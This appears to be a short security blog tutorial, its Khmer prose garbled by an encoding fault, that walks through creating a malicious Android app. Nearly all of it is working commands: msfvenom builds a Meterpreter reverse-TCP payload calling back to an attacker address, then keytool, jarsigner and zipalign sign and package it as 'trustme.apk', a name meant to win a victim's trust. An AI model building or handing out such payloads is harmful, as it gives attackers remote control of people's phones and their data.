This page looks best with JavaScript enabled

Android H4cking: Creating Malicious APK Payload

 ·  β˜• 1 min read  ·  🐱 thik

αžαž˜αŸ’αžšαžΌαžœαž€αžΆαžš

  • ziplign
  • jarsigner
  • keytool

αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ Metasploit αžŠαžΎαž˜αŸ’αž”αžΈαž”αž„αŸ’αž€αžΎαž Android Payload

msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=192.168.13.X lport=4444 R -o pload.apk

αžšαž”αŸ€αž” Sign αž―αž€αžŸαžΆαžš APK - αž”αž„αŸ’αž€αžΎαž Keystore

keytool -genkey -V -keystore key.keystore -alias Android -keyalg RSA -keysize 2048 -validity 10000

// αž”αž‰αŸ’αž…αžΌαž›αž›αŸαžαžŸαŸ†αž„αžΆαžαŸ‹αžšαž”αžŸαŸ‹ RSA αž“αž·αž„αž–αŸαžαŸŒαž˜αžΆαž“αž²αŸ’αž™αž”αžΆαž“αžαŸ’αžšαžΉαž˜αžαŸ’αžšαžΌαžœ

αžšαž”αŸ€αž” Sign αž―αž€αžŸαžΆαžš APK - Sign Payload

sudo apt-get install openjdk-21-jdk-headless
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore pload.apk Android

// αž”αž‰αŸ’αž…αžΌαž›αž›αŸαžαžŸαŸ†αž„αžΆαžαŸ‹αžšαž”αžŸαŸ‹ RSA αž²αŸ’αž™αž”αžΆαž“αžαŸ’αžšαžΉαž˜αžαŸ’αžšαžΌαžœ

αžšαž”αŸ€αž” Sign αž―αž€αžŸαžΆαžš APK - Verify Payload

jarsigner -verify -verbose -certs pload.apk

αžšαž”αŸ€αž” Sign αž―αž€αžŸαžΆαžš APK - Verify payload into new file

zipalign -v 4 pload.apk trustme.apk

αž₯αž‘αžΌαžœαž“αŸαŸ‡αž’αŸ’αž“αž€αž‘αž‘αž½αž›αž”αžΆαž“ Android Payload αžŠαŸ‚αž›αž–αŸαž‰αž›αŸαž‰αž˜αž½αž™αžˆαŸ’αž˜αŸ„αŸ‡αžαžΆ trustme.apk αŸ•

Share on
Thik
WRITTEN BY
thik
Security Researcher

See Also